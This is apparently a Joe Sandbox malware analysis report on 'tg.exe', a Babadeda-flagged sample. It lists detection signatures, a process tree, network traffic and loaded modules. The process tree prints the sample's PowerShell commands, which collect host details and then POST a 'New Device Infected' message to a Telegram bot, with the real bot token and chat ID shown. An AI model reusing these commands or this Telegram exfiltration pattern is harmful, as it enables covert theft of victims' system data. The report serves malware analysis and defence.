Edit tour

Windows Analysis Report
tg.exe

Overview

General Information

Sample name:	tg.exe
Analysis ID:	1579564
MD5:	f8ecedc88e4d2776486231d0ef0aea5d
SHA1:	fccc180c84dec726668d48f09b8a0c1c1fba07a1
SHA256:	b5c30a14e79065ea9a095eca6655829aca6272e61b1a73a31fa376ff8b3a793b
Tags:	exeuser-aachum
Infos:

Detection

Babadeda

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for submitted file

Sigma detected: Check external IP via Powershell

Yara detected Babadeda

AI detected suspicious sample

Machine Learning detection for sample

Uses the Telegram API (likely for C&C communication)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

tg.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\tg.exe" MD5: F8ECEDC88E4D2776486231D0EF0AEA5D)

cmd.exe (PID: 7556 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7624 cmdline: powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7772 cmdline: powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7912 cmdline: powershell -Command "$env:COMPUTERNAME" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7992 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 8008 cmdline: powershell -Command "[System.Environment]::OSVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 8100 cmdline: powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8176 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:12:07, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}" MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
tg.exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.tg.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
0.0.tg.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7556, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", ProcessId: 7756, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')", CommandLine: powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7608, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')", ProcessId: 7624, ProcessName: powershell.exe

Language, Device and Operating System Detection

Sigma detected: Check external IP via Powershell

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7556, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')", ProcessId: 7756, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: tg.exe	ReversingLabs: Detection: 23%
Source: tg.exe	Virustotal: Detection: 30%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: tg.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\tg.exe

Unpacked PE file: 0.2.tg.exe.400000.0.unpack

Source: tg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\Temp\D272.tmp	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.tmp	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	File opened: C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp	Jump to behavior

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 260Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 260Expect: 100-continueConnection: Keep-Alive

Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000000D.00000002.1790067889.000001F2B0694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B3BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C23D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B3A73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B2221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B389B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B3A73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B2221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: tg.exe, 00000000.00000002.4150754804.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipi
Source: tg.exe, 00000000.00000002.4150843497.0000000000950000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000940000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000947000.00000004.00000020.00020000.00000000.sdmp, D274.bat.0.dr	String found in binary or memory: https://api.ipify.org?format=text
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B383B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B356A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: tg.exe, 00000000.00000002.4150843497.0000000000950000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000940000.00000004.00000020.00020000.00000000.sdmp, tg.exe, 00000000.00000002.4150754804.0000000000947000.00000004.00000020.00020000.00000000.sdmp, D274.bat.0.dr	String found in binary or memory: https://api.telegram.org/bot%botToken%/sendMessage
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B2221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage
Source: powershell.exe, 0000000D.00000002.1811694654.000001F2CA5E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7879910740:aaempll82moqqk9txwsc5yk5uz56ixr0bzq/sendmessage
Source: powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B3A73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B2E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B3BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C23D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1807136479.000001F2C2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B389B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000D.00000002.1790251554.000001F2B389B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_0040C898	0_2_0040C898
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_0040E950	0_2_0040E950
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_00410910	0_2_00410910
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_004109D9	0_2_004109D9
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_004105E0	0_2_004105E0
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_00411580	0_2_00411580
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_00410993	0_2_00410993
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_00410600	0_2_00410600
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_0040B347	0_2_0040B347
Source: C:\Users\user\Desktop\tg.exe	Code function: 0_2_0040F3C8	0_2_0040F3C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9BABCBE0	13_2_00007FFD9BABCBE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9BABE185	13_2_00007FFD9BABE185
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD9BABE0FC	13_2_00007FFD9BABE0FC

Source: tg.exe, 00000000.00000002.4150419992.0000000000570000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameCmd.Exej% vs tg.exe

Source: tg.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal84.troj.spyw.evad.winEXE@26/14@2/2

Source: C:\Users\user\Desktop\tg.exe

Code function: 0_2_004026B8 LoadResource,SizeofResource,FreeResource,

0_2_004026B8

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\System

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03

Source: C:\Users\user\Desktop\tg.exe

File created: C:\Users\user\AppData\Local\Temp\D272.tmp

Jump to behavior

Source: C:\Users\user\Desktop\tg.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe"

Source: C:\Users\user\Desktop\tg.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\tg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tg.exe	ReversingLabs: Detection: 23%
Source: tg.exe	Virustotal: Detection: 30%

Source: unknown	Process created: C:\Users\user\Desktop\tg.exe "C:\Users\user\Desktop\tg.exe"
Source: C:\Users\user\Desktop\tg.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:12:07, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
Source: C:\Users\user\Desktop\tg.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat C:\Users\user\Desktop\tg.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:12:07, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$env:COMPUTERNAME"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "[System.Environment]::OSVersion"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"	Jump to behavior

Source: C:\Users\user\Desktop\tg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\tg.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
